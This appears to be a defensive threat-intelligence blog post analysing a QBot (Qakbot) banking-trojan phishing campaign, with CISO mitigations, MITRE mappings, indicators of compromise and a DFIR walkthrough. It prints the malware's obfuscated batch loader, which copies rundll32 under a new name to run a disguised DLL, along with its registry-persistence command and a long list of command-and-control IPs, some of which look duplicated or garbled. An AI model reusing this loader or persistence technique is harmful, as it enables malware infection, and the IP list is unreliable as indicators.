QBot, also known as Qakbot, QBot, QuackBot, and Pinkslipbot, is a Banking Trojan that was first observed in 2007. Today, Qbot is still a dangerous and persistent threat to organizations and has become one of the leading Banking Trojans globally. In the past month, we have observed an increase in attacks and they seem to be attacking organizations to collect valuable information which can be replayed against partner organizations. This makes the attack seem real by knowing key information and often including a false email trail.
To this day, QBot continues to grow and develop, with more capabilities and new techniques. Its main purpose is to steal banking data (banking credentials, online banking session information, victim’s personal details, etc.). However, its developers have also developed functionalities that allow QBot to spread itself, evade detection and debugging, and install additional malware on compromised machines, such as Cobalt Strike, REvil, ProLock, and Egregor ransomware.
The process to obtain persistence has many layers of obfuscation where known DLL files and/or Trusted system executables are being used to inject processes in an attempt to hide from EDR / Antivirus solutions.
Qbot uses multiple attack vectors to infect victims. QBot is distributed through phishing emails containing malicious documents, attachments, or password-protected archives with the documents attached. Some versions of the malware were observed being distributed by a dropper, such as Emotet.
For the CISO
Today Phishing emails present risks to most modern enterprises and they continue to get more creative and advanced. Currently, we are seeing a rise in sophisticated phishing campaigns often targeted at each enterprise. Currently, QBot malware is using a DLL injection or DLL hijacking attack methods to exploit how Dynamic Link Libraries (DLLs) are loaded in Windows.
Adversaries may abuse rundll32.exe to proxy the execution of malicious code. Using rundll32.exe versus executing directly may help avoid detection and may also hide in a sea of log data often overlooked by enterprise security teams.
Chain of Attack
- phishing email >> link OR HTML >> download zip >> unzip >> mount iso image >> autorun lnk >> rundll32 process injection >> persistence
Security Controls for CISO
Based on the current attacks observed to date they have a common theme, where emails are from spoofed domains or email addresses. Often the bodies contain company references and historical email threads. As CISO we should ensure minimum baselines when considering email risks and external user authentication.
- Modern Next-Generation Proof Point Email Protection
- DKIM, DMARC, and SPF records
- SPF Hard Failure is used to drop inbound proofed emails.
- Backscatter on O365
- Email Authentication MFA
- User Education and Phishing Training
Each phishing attack does require human intervention, so the human factor is the common weak link. Here is a short list of items identified and potential mitigation strategies.
- Block non-standard attachments
- Consider limiting Corporate email to Word Documents, Spreadsheets, Powerpoint, PDF and ideally shift toward filesharing services.
- User Training
- Staff should never interact with password-protected files, without verbal or physical confirmation that the sender is known.
- GPO Policy
- Remove Autorun for external drives and images, since this attachment leverages this windows feature.
The last stage of the attack is where persistence plus command and control is established. Visibility and mitigation are limited at this point and we can say the horses have already left the barn. Regardless it is very important to be utilizing best in breed tools to ensure maximum effectiveness.
- Utilize Next Generation EDR product Crowdstrike or Microsoft Defender
- DNS Filtering
- Next-Generation Firewall Fortinet / Palo Alto
- Security Operation and Threat Hunting Team
However, the recon tools and tactics after execution are very common and should be monitored.
- net use
- arp -a
- registry key startup creation
If left unchecked for long enough ransomware gangs, including Black Basta, Egregor, and Prolock use the malware to gain initial access to corporate networks and then proceed to exfil data and encrypt data. I will continue to investigate the current Qbot attacks and convert this into a blue team threat hunt.
- https://www.cisa.gov/sites/default/files/publications/202010221030_QakBot TLPWHITE.pd
- Masquerading – Mitre T1036 – renamed rundll32 executable was launched
- Software Packing – Mitre T1027.002 – packed executable was written to disk
- Process Injection – Mitre T1055 – rundll32 used to inject process
- Persistence – Mitre TA0003 – registry start key was added
- Process Injection – Mitre T0155
- Discovery Process – Mitre 1057
Indicators of Compromise
muuopzfn.dll MD5:c59c67fe5908c2cf67d2a7baf548d317 SHA256:0f0ee6558b84cbf678049bc076475122e93b1a0e07eef6bf1a4cd1daaf946f22 https://www.virustotal.com/gui/file/0f0ee6558b84cbf678049bc076475122e93b1a0e07eef6bf1a4cd1daaf946f22
Command and Control
126.96.36.199:995 188.8.131.52:443 184.108.40.206:443 220.127.116.11:993 18.104.22.168:993 22.214.171.124:995 126.96.36.199:32103 188.8.131.52:995 184.108.40.206:2222 220.127.116.11:995 18.104.22.168:443 22.214.171.124:443 126.96.36.199:995 188.8.131.52:995 184.108.40.206:50000 220.127.116.11:443 18.104.22.168:443 22.214.171.124:443 126.96.36.199:443 188.8.131.52:443 184.108.40.206:443 220.127.116.11:995 18.104.22.168:443 22.214.171.124:995 126.96.36.199:443 188.8.131.52:443 184.108.40.206:443 220.127.116.11:443 18.104.22.168:2222 22.214.171.124:443 126.96.36.199:993 188.8.131.52:443 184.108.40.206:995 220.127.116.11:443 18.104.22.168:3389 22.214.171.124:443 126.96.36.199:995 188.8.131.52:443 184.108.40.206:443 220.127.116.11:443 18.104.22.168:995 22.214.171.124:443 126.96.36.199:443 188.8.131.52:443 184.108.40.206:995 220.127.116.11:443 18.104.22.168:995 22.214.171.124:2222 126.96.36.199:2087 188.8.131.52:443 184.108.40.206:443 220.127.116.11:443 18.104.22.168:993 22.214.171.124:443 126.96.36.199:443 188.8.131.52:443 184.108.40.206:443 220.127.116.11:443 18.104.22.168:443 22.214.171.124:995 126.96.36.199:32101 188.8.131.52:443 184.108.40.206:443 220.127.116.11:443 18.104.22.168:2222 22.214.171.124:995 126.96.36.199:443 188.8.131.52:443 184.108.40.206:2222 220.127.116.11:2222 18.104.22.168:443 22.214.171.124:443 126.96.36.199:443 188.8.131.52:443 184.108.40.206:443 220.127.116.11:995 18.104.22.168:443 22.214.171.124:443 126.96.36.199:443 188.8.131.52:443 184.108.40.206:443 220.127.116.11:443 18.104.22.168:443 22.214.171.124:443 126.96.36.199:2222 188.8.131.52:443 184.108.40.206:995 220.127.116.11:443 18.104.22.168:443 22.214.171.124:2078 126.96.36.199:443 188.8.131.52:443 184.108.40.206:443 220.127.116.11:443 18.104.22.168:995 22.214.171.124:443 126.96.36.199:443 188.8.131.52:995 184.108.40.206:2078 220.127.116.11:443 18.104.22.168:2222 22.214.171.124:995 126.96.36.199:2222 188.8.131.52:2078 184.108.40.206:443 220.127.116.11:995 18.104.22.168:443 22.214.171.124:443 126.96.36.199:443 188.8.131.52:443 184.108.40.206:443 220.127.116.11:443 18.104.22.168:2222 22.214.171.124:2222 126.96.36.199:2222 188.8.131.52:2222 184.108.40.206:443 220.127.116.11:995
whoami arp -a net use ipconfig /all netstat.exe route.exe
Detailed DFIR Investigation
After Clicking on the HTML Payload a fake Adobe Screen is presented, which triggers a zipped payload to be downloaded automatically. The file is password-protected Zip with ISO image set to autorun once mounted.
After unzipping the payload we double click on the ISO image which results in the following command being executed
C:\Windows\system32\cmd.exe /c E:\yardland.cmd
SETLOCAL EnableDelayedExpansion start unfeignedness_sitiophobia.png set x3=run set x2=dll set x1=32 if %random% neq 100 ( set tmp1=!x1! set x1=!x3! set x3=!tmp1! ) else ( set tmp1=!x2! set x1=!x1! set x2=!tmp1! ) set exe2=templ set exe1=ates201.png if %random% neq 200 ( set tmp2=!exe1! set exe1=!exe2! set exe2=!tmp2! ) else ( set tmp2=!x1! set exe1=!tmp2! set exe2=!x2! ) if %random% neq 300 ( set xxx=#1 ) else ( set xxx=unfeignedness_sitiophobia.png ) echo f|xcopy %SystemRoot%\system32\%x1%%x2%%x3%.exe %temp%\companionably.exe /h /s /e set t3=%temp%\%random%.%random% echo f|xcopy !exe1!!exe2! %t3% /h /s /e %temp%\companionably.exe %t3%,%xxx%
The following Process tree illustrates the Parent-Child process relationship and each command which spawned from yardland.cmd execution.
Masquerading – Mitre T1036
A renamed rundll32 executable was launched. Adversaries can rename files to evade detection. Review the command line and process tree.
xcopy C:\Windows\system32\rundll32.exe C:\Users\admin\AppData\Local\Temp\companionably.exe /h /s /e
Software Packing – Mitre T1027.002
A packed executable has been written to disk. If this is unexpected, it might indicate suspicious activity. Review the process tree and related file written events.
xcopy templates201.png C:\Users\admin\AppData\Local\Temp\2694.7172 /h /s /e
Process Injection – Mitre T1055
Using rundll32 to inject process A likely malicious process injected into another process in a suspicious way.
Persistence (Registry Key Added) – Mitre TA0003
A process made a suspicious change to the registry that may be indicative of a malicious persistence mechanism.
“C:\Windows\SysWOW64\CertEnrollCtrl.exe” was used write DLL “AppData\Roaming\Microsoft\Pnkelie\muuopzfn.dll”
regsvr32.exe "C:\Users\admin\AppData\Roaming\Microsoft\Pnkelie\muuopzfn.dll" \REGISTRY\USER\S-1-5-21-X-X-X-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Investigation of “Muuopzfn.dll”
- Process Injection – Mitre T0155
- Discovery Process – Mitre 1057
|Behavioural detection: Injection (Process Hollowing)||High||Injection:rundll32.exe(2792) -> wermgr.exe(1516)|
|Executed a process and injected code into it, probably while unpacking||High||Injection:rundll32.exe(2792) -> wermgr.exe(1516)|
|Access the NetLogon registry key, potentially used for discovery or tampering||Medium||regkey:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters|
|Enumerates running process||Medium||process:System with pid 4|
process:smss.exe with pid 268
process:csrss.exe with pid 356
process:wininit.exe with pid 392
process:csrss.exe with pid 400
process:winlogon.exe with pid 428
process:services.exe with pid 488
process:lsass.exe with pid 496
process:lsm.exe with pid 504
process:svchost.exe with pid 604 ….